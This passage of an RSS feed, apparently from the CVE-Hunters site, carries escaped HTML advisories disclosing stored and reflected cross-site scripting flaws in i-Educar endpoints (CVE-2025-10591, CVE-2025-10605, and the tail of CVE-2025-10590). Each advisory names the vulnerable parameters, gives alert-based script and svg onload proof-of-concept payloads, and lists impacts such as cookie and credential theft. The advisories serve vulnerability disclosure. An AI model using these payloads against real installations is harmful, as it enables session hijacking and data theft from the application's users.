class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;String&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;fromCharCode&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;88&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;))&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;SCRIPT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10590/image.png&amp;#34;
	width=&amp;#34;1021&amp;#34;
	height=&amp;#34;565&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10590/image_hu_f7f8725a4c3c24c2.png 480w, /p/cve-2025-10590/image_hu_2dd04bd1070639af.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;180&amp;#34;
		data-flex-basis=&amp;#34;433px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10590.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10590.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10591</title>
        <link>https://www.cvehunters.com/p/cve-2025-10591/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10591/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10591-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_funcao_cadphp&amp;#34;&amp;gt;CVE-2025-10591: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_funcao_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10591&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10591&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_funcao_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_funcao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10591-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_funcao_cadphp&amp;#34;&amp;gt;CVE-2025-10591: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;educar_funcao_cad.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10591&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10591&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;educar_funcao_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_funcao_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;abreviatura&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload-1&amp;#34;&amp;gt;Payload 1:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;svg&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onload&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(15888888)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;payload-2&amp;#34;&amp;gt;Payload 2:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10591/image.png&amp;#34;
	width=&amp;#34;1193&amp;#34;
	height=&amp;#34;615&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10591/image_hu_9dfb1cc0643b24b3.png 480w, /p/cve-2025-10591/image_hu_a0e3d84ac9dcf37.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;465px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10591/image-1.png&amp;#34;
	width=&amp;#34;1228&amp;#34;
	height=&amp;#34;568&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10591/image-1_hu_1c1df20dcb8f0e5d.png 480w, /p/cve-2025-10591/image-1_hu_10a5213779d6b9a0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;518px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10591.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10591.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10605</title>
        <link>https://www.cvehunters.com/p/cve-2025-10605/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-10605/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10605-cross-site-scripting-xss-reflected-in-endpoint-agenda_preferenciasphp-parameter-tipoacao&amp;#34;&amp;gt;CVE-2025-10605: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10605&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10605&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/agenda_preferencias.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10605/image.png&amp;#34;
	width=&amp;#34;736&amp;#34;
	height=&amp;#34;565&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10605/image_hu_61255b2402b529c7.png 480w, /p/cve-2025-10605/image_hu_f2589c925b0a1d14.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;130&amp;#34;
		data-flex-basis=&amp;#34;312px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10605-cross-site-scripting-xss-reflected-in-endpoint-agenda_preferenciasphp-parameter-tipoacao&amp;#34;&amp;gt;CVE-2025-10605: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10605&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10605&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/agenda_preferencias.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
